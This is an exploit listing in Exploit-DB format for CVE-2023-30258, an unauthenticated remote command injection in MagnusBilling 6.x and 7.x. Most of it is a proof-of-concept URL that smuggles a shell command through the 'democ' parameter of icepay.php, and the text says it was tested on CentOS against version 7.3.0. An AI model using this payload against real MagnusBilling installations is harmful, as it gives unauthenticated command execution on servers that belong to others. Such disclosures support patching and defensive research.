# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
# Software Link: [https://github.com/magnussolution/magnusbilling7]
# Version: [7.3.0] 
# Tested on: [Centos]
# CVE : [CVE-2023-30258]

PoC:
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.

[Replace Your Domain Name]